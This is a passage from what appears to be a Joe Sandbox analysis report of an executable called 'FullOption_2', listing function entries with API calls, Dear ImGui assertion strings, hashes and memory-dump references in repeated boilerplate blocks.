                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$GImGui != 0 && "No current context. Did you call ImGui::CreateContext() and ImGui::SetCurrentContext() ?"$IsNamedKey((ImGuiKey)io.KeyMap[key])$N/A$None$Remaining$Unknown
                                                                                  • API String ID: 3234217646-4131959212
                                                                                  • Opcode ID: c58bf9f023511f755b05986f4ed566be0e9d18f8e70d696eb5fe69999530ea27
                                                                                  • Instruction ID: fd4c9b5fc16d3ebc81039de05fe96c6c3ec6e34340aabfec6a0cd5acb26379aa
                                                                                  • Opcode Fuzzy Hash: c58bf9f023511f755b05986f4ed566be0e9d18f8e70d696eb5fe69999530ea27
                                                                                  • Instruction Fuzzy Hash: D9319120F4AA4699FF60BF16D8C03B81260EF25310F583972FA1EC62D1EF5CA895A701
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (g.StyleVarStack.Size > count) && "Calling PopStyleVar() too many times: stack underflow."$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$Size > 0$idx >= 0 && idx < ImGuiStyleVar_COUNT
                                                                                  • API String ID: 3234217646-938468900
                                                                                  • Opcode ID: a70d0389991c3fbbd69fbee62d91dc04aa4ff948d1082a87e5a746c8cff0cc55
                                                                                  • Instruction ID: 34f82a8b4ab0894f8edef7b595745f6961bf915db31a874fe7fc40d4efa7eeb4
                                                                                  • Opcode Fuzzy Hash: a70d0389991c3fbbd69fbee62d91dc04aa4ff948d1082a87e5a746c8cff0cc55
                                                                                  • Instruction Fuzzy Hash: FB31F175A1AAC6C7E720FF0AE88056933A0FB25744F952435EA4DCB654CF3CE542CB00
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: memcpy$Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturnmalloc
                                                                                  • String ID:
                                                                                  • API String ID: 4116581550-0
                                                                                  • Opcode ID: d5756671b4d586e639011103fc89c55d63fbd9e26a3cfafcfdf86d94d2dda1b7
                                                                                  • Instruction ID: 99cd4219fad4b69818bc3fc51b20fa01bf14f2b14b895092cbba96451f7de884
                                                                                  • Opcode Fuzzy Hash: d5756671b4d586e639011103fc89c55d63fbd9e26a3cfafcfdf86d94d2dda1b7
                                                                                  • Instruction Fuzzy Hash: 6361BF62B0A78686EE11EB13E4043B96255EB24BE0F544631FF6D8BBC6DE7DE452C304
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: memset$_wassertmallocmemcpy
                                                                                  • String ID: #MOVE$D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 2962147378-3763609640
                                                                                  • Opcode ID: 0dab5498b63513ba4aa8fc68b5a6f5dbcbd32681910e886eac059c501d744841
                                                                                  • Instruction ID: 73bb9a0f3f2438bea387a3598cb3c7e36265fc19aa160917e80c08a60e39bf2c
                                                                                  • Opcode Fuzzy Hash: 0dab5498b63513ba4aa8fc68b5a6f5dbcbd32681910e886eac059c501d744841
                                                                                  • Instruction Fuzzy Hash: 55C15932606B819AD354DF29E98879C77A8F754F14FAD5238D7A84B3A0DF36E062C704
                                                                                  APIs
                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6DD888
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6DD9A3
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6DDA00
                                                                                    • Part of subcall function 00007FF6AE6F0A70: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6DD94F), ref: 00007FF6AE6F0AC5
                                                                                    • Part of subcall function 00007FF6AE6F0A70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6DD94F), ref: 00007FF6AE6F0B21
                                                                                    • Part of subcall function 00007FF6AE6F0A70: memcpy.VCRUNTIME140(?,?,?,00007FF6AE6DD94F), ref: 00007FF6AE6F0B3D
                                                                                    • Part of subcall function 00007FF6AE6F0A70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6DD94F), ref: 00007FF6AE6F0B5D
                                                                                    • Part of subcall function 00007FF6AE6F0A70: memmove.VCRUNTIME140(?,?,?,00007FF6AE6DD94F), ref: 00007FF6AE6F0B8C
                                                                                    • Part of subcall function 00007FF6AE6F0780: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000008,00007FF6AE6F53DA,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6F56CE), ref: 00007FF6AE6F07B3
                                                                                    • Part of subcall function 00007FF6AE6F0780: memcpy.VCRUNTIME140(?,?,00000008,00007FF6AE6F53DA,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6F56CE), ref: 00007FF6AE6F07CF
                                                                                    • Part of subcall function 00007FF6AE6F0780: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000008,00007FF6AE6F53DA,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6F56CE), ref: 00007FF6AE6F07EF
                                                                                  • memmove.VCRUNTIME140 ref: 00007FF6AE6DDA60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertmalloc$freememcpymemmove
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$it >= Data && it <= Data + Size$p >= begin() && p < end()
                                                                                  • API String ID: 518937240-2191190348
                                                                                  • Opcode ID: a5e879d64983a942f5bb1c03961cc7679a52f1aeba718b0f1dced062b47bb48f
                                                                                  • Instruction ID: 0eb19257499b232d1b3acddef2a85176f7c156645247345fdd5d93cf76573b5c
                                                                                  • Opcode Fuzzy Hash: a5e879d64983a942f5bb1c03961cc7679a52f1aeba718b0f1dced062b47bb48f
                                                                                  • Instruction Fuzzy Hash: 5B61E766B1AA9686EF10BF26D5402B87391EF54BD4F98B631EE0DC7794DE3CE8418700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: Ctx != 0$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$i >= 0 && i < Size$mouse_button >= 0 && mouse_button < ImGuiMouseButton_COUNT
                                                                                  • API String ID: 3234217646-446684191
                                                                                  • Opcode ID: 53a8597719bda3bd5f6038b07e7132827c0777cf6494b92ee11d3459d600c383
                                                                                  • Instruction ID: 36a230fabc3204e8c981b173b33540e46dd5388f7d4e6476e822e54194758865
                                                                                  • Opcode Fuzzy Hash: 53a8597719bda3bd5f6038b07e7132827c0777cf6494b92ee11d3459d600c383
                                                                                  • Instruction Fuzzy Hash: 05412B36A1EE92C5E721DF26D44027977A1FBA4B44F956131FA4D87A94CF3CE982CB00
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6AE6D7D04,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F0105
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6AE6D7D04,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F0135
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6D7D04,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F0167
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6D7D04,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F0189
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6D7D04,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F01D6
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6D7D04,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F0200
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: free$_wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 94870348-608382026
                                                                                  • Opcode ID: e8dc6bc04e0ac1cfec56a4d64e056ec530d19a51f6dc08a589415814cc0db85a
                                                                                  • Instruction ID: 465e0129a5544af9740f1aa4e0db1043122a878280ef129104ce6a16ff2a90d8
                                                                                  • Opcode Fuzzy Hash: e8dc6bc04e0ac1cfec56a4d64e056ec530d19a51f6dc08a589415814cc0db85a
                                                                                  • Instruction Fuzzy Hash: BB416D32A0AB4291EB64EF52E8542397361FF64B80F446436EE5D83B64DF3CE852D350
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF6AE6E8CF4,?,?,?,?,00000000,00007FF6AE6E331D,?,?,00000000,00007FF6AE6D94A9), ref: 00007FF6AE6E8D70
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF6AE6E8CF4,?,?,?,?,00000000,00007FF6AE6E331D,?,?,00000000,00007FF6AE6D94A9), ref: 00007FF6AE6E8D96
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF6AE6E8CF4,?,?,?,?,00000000,00007FF6AE6E331D,?,?,00000000,00007FF6AE6D94A9), ref: 00007FF6AE6E8DCC
                                                                                    • Part of subcall function 00007FF6AE6EFAC0: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000000,00007FF6AE6D8D0A), ref: 00007FF6AE6EFB5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$[popup] ClosePopupToLevel(%d), restore_focus_to_window_under_popup=%d$i >= 0 && i < Size$remaining >= 0 && remaining < g.OpenPopupStack.Size
                                                                                  • API String ID: 3234217646-2791774212
                                                                                  • Opcode ID: 919ca89e38c54d2936d7cc4843a41c32eeca635a1d727cd03c3b9fef098efe9a
                                                                                  • Instruction ID: 8524069d9509d360038a5f2fce306355bf7d9fbfd9e237bf0f232f12f50baaf1
                                                                                  • Opcode Fuzzy Hash: 919ca89e38c54d2936d7cc4843a41c32eeca635a1d727cd03c3b9fef098efe9a
                                                                                  • Instruction Fuzzy Hash: 3F418322B0AB8395EA24AB16E8402B9A761EFB2740F0C7835FA5D872D5DF7CE4419700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F73E0
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F741A
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F7447
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F7471
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F749C
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6F74EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertfree
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3366704412-608382026
                                                                                  • Opcode ID: 5fb1641ce8a900633a738984c7c2326180f037c992bdc67af77c240354d5a1bb
                                                                                  • Instruction ID: 6a8ad6bd370fd94e09ceb62d0e815bba712866f5bb18fbe7b7ff1d0e0daebe6e
                                                                                  • Opcode Fuzzy Hash: 5fb1641ce8a900633a738984c7c2326180f037c992bdc67af77c240354d5a1bb
                                                                                  • Instruction Fuzzy Hash: B5419A32B2AB82D2EA249F02E4805697761FFA4B40B486535EF5D83B50DF7EF4A1D300
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$PackIdMouseCursors != -1$i >= 0 && i < Size$index >= 0
                                                                                  • API String ID: 3234217646-2871648907
                                                                                  • Opcode ID: 23323ffbd8c7819a12e2788263c4ee40f1de50b5a05538cc060a2709ec9bc163
                                                                                  • Instruction ID: 3bf05cf53d347011a72ed5f6f51610c38699c510c6f74a292445c877407825bd
                                                                                  • Opcode Fuzzy Hash: 23323ffbd8c7819a12e2788263c4ee40f1de50b5a05538cc060a2709ec9bc163
                                                                                  • Instruction Fuzzy Hash: 0241D333925B8586D311DF37D840068B760FFA9B85B19E722EA58635A4DF3CE486EB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (flags & ~ImGuiInputFlags_SupportedByIsKeyPressed) == 0$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$button >= 0 && button < ((int)(sizeof(g.IO.MouseDown) / sizeof(*(g.IO.MouseDown))))$button >= 0 && button < ImGuiMouseButton_COUNT
                                                                                  • API String ID: 3234217646-2465824988
                                                                                  • Opcode ID: 871dff5ef95acc8d1a530e78fae9e89f5e9d869f7beac3531ae827e601b3848b
                                                                                  • Instruction ID: 04df5f6ced288e3d772e8ff8e590816772685bda01e2880ee805d63060e81286
                                                                                  • Opcode Fuzzy Hash: 871dff5ef95acc8d1a530e78fae9e89f5e9d869f7beac3531ae827e601b3848b
                                                                                  • Instruction Fuzzy Hash: 1E312722E0AA4784E622AB37A8011B97350BF76384F197B31F95DB31E4DF2DF9858740
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6E3415,?,?,?,?,?,00000000,?,00007FF6AE6E8CF4), ref: 00007FF6AE6ED53E
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6E3415,?,?,?,?,?,00000000,?,00007FF6AE6E8CF4), ref: 00007FF6AE6ED564
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6E3415,?,?,?,?,?,00000000,?,00007FF6AE6E8CF4), ref: 00007FF6AE6ED58B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$g.WindowsFocusOrder[order] == window$i >= 0 && i < Size$window->RootWindow == window
                                                                                  • API String ID: 3234217646-1614152617
                                                                                  • Opcode ID: a017b1ac43d6717a81eeaa25cb2e236a1a2b65ab1a6b4a86b31cf250a2859fdb
                                                                                  • Instruction ID: 0760a4f34c595ef32fc8e14c2c6e31036df0ae58aa1a2d33196ab8aed87bbd33
                                                                                  • Opcode Fuzzy Hash: a017b1ac43d6717a81eeaa25cb2e236a1a2b65ab1a6b4a86b31cf250a2859fdb
                                                                                  • Instruction Fuzzy Hash: EA115B21B2AA9291EB20EF1BEC801B96324FB60B84F446575F51EC7AA4DF7CE546C700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
